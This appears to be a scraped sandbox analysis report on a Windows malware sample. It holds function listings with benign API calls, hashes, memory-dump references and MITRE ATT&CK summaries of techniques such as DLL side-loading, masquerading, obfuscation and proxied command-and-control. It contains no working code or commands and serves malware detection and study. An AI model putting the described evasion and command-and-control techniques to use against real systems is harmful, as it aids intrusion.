String ID: Netapi32.dll$Netbios
API String ID: 190572456-3142203730
Opcode ID: f23ef0fd6ca6804300dfba4c135efc9f345cfa2d6ad48e6a9698552a32c627af
Instruction ID: d429dd77b374c41b492142906f73519192d647793478a14b4f95942b4cca67f8
Opcode Fuzzy Hash: f23ef0fd6ca6804300dfba4c135efc9f345cfa2d6ad48e6a9698552a32c627af
Instruction Fuzzy Hash: BEE092E03052019BAB008BB1BCC1B63339866AA780714027BA942C7252E729DD01D628

Function 0047A474 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0047A200: GetProcessHeap.KERNEL32(C1DE166F), ref: 0047A228

ReleaseMutex.KERNEL32(?), ref: 0047A47D
CloseHandle.KERNEL32(?), ref: 0047A49F

Part of subcall function 0047A8A0: GetProcessHeap.KERNEL32(?,0047A492), ref: 0047A8A6
Part of subcall function 0047A8A0: HeapFree.KERNEL32(00000000,00000000,?), ref: 0047A8B4

Strings

(bN, xrefs: 0047A4AC

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Heap$Process$CloseFreeHandleMutexRelease
String ID: (bN
API String ID: 3832489521-263236600
Opcode ID: d957a6a7a796b828490e71499ce251828a244c3c8b724b0685df1eef20c7035f
Instruction ID: 096040a672289b3e11b7f3a286a86e08f0e024de8603eaa531badf1606ead50a
Opcode Fuzzy Hash: d957a6a7a796b828490e71499ce251828a244c3c8b724b0685df1eef20c7035f
Instruction Fuzzy Hash: 06D01235405100DBC721AFA4994C6AE3634ABD4734F558399E4142B3A1CB7D98129B9F

Function 0047A4C0 Relevance: 5.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0047A200: GetProcessHeap.KERNEL32(C1DE166F), ref: 0047A228

GetProcessHeap.KERNEL32(00000000,?), ref: 0047A4FC
HeapFree.KERNEL32(00000000), ref: 0047A4FF
GetProcessHeap.KERNEL32(?), ref: 0047A51D
HeapFree.KERNEL32(00000000,00000000,?), ref: 0047A527

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: 799aa3df361be9bd4b2d852b99a9f77535238c035179bec6a1d7b42f949e0c41
Instruction ID: c2409097a47e11fdc18ddb454556df87e0a1a1e7dbbeb792cb94f8ddfad5f825
Opcode Fuzzy Hash: 799aa3df361be9bd4b2d852b99a9f77535238c035179bec6a1d7b42f949e0c41
Instruction Fuzzy Hash: 97F062B42002016AE6106BB69CC0F9B379CEB84754F05447AF504D7292DB28D911CEAE

Function 004812F5 Relevance: 5.0, APIs: 4, Instructions: 35COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,0048176E,?,00000004,00482166,004811E3,0048109F), ref: 00481303
TlsGetValue.KERNEL32(00000000,?,?,?,?,0048176E,?,00000004,00482166,004811E3,0048109F), ref: 00481317
LeaveCriticalSection.KERNEL32(0000001C,?,?,?,?,0048176E,?,00000004,00482166,004811E3,0048109F), ref: 0048132D
LeaveCriticalSection.KERNEL32(0000001C,?,?,?,?,0048176E,?,00000004,00482166,004811E3,0048109F), ref: 00481338

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: 2eb8143d16b96fe20407a2807648c7d5777e547820bd44a6f7599181c3c35a9a
Instruction ID: 886de88204651613f43c6504577490083374166954f47bde11cdd7f46d7301a6
Opcode Fuzzy Hash: 2eb8143d16b96fe20407a2807648c7d5777e547820bd44a6f7599181c3c35a9a
Instruction Fuzzy Hash: 4DF030362006049FA720AF69EC48C5AB7EDEA957643154A6FEC45D3621DA35F802CB58

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.FileRepMalware.7838.24766.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\config

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Windows Analysis Report
SecuriteInfo.com.FileRepMalware.7838.24766.exe

Function 00414EC6 Relevance: 49.7, APIs: 2, Strings: 26, Instructions: 680
COMMON

Function 0040541D Relevance: 47.6, APIs: 1, Strings: 26, Instructions: 359
COMMON

Function 0040609D Relevance: 47.5, APIs: 1, Strings: 26, Instructions: 241
COMMON

Function 004158C8 Relevance: 28.7, APIs: 2, Strings: 14, Instructions: 721
nativeCOMMON

Function 004153B1 Relevance: 28.7, APIs: 2, Strings: 14, Instructions: 674
nativeCOMMON

Function 00415424 Relevance: 28.4, APIs: 2, Strings: 14, Instructions: 417
nativeCOMMON

Function 004153B6 Relevance: 28.4, APIs: 2, Strings: 14, Instructions: 366
nativeCOMMON

Function 004153BD Relevance: 28.4, APIs: 2, Strings: 14, Instructions: 366
nativeCOMMON

Function 004153D1 Relevance: 28.4, APIs: 2, Strings: 14, Instructions: 358
nativeCOMMON

Function 004153FB Relevance: 28.3, APIs: 2, Strings: 14, Instructions: 343
nativeCOMMON

Function 0041E805 Relevance: 26.7, APIs: 1, Strings: 14, Instructions: 469
COMMON

Function 00414A30 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 344
COMMON

Function 00416050 Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 298
COMMON

Function 0041612B Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 249
COMMON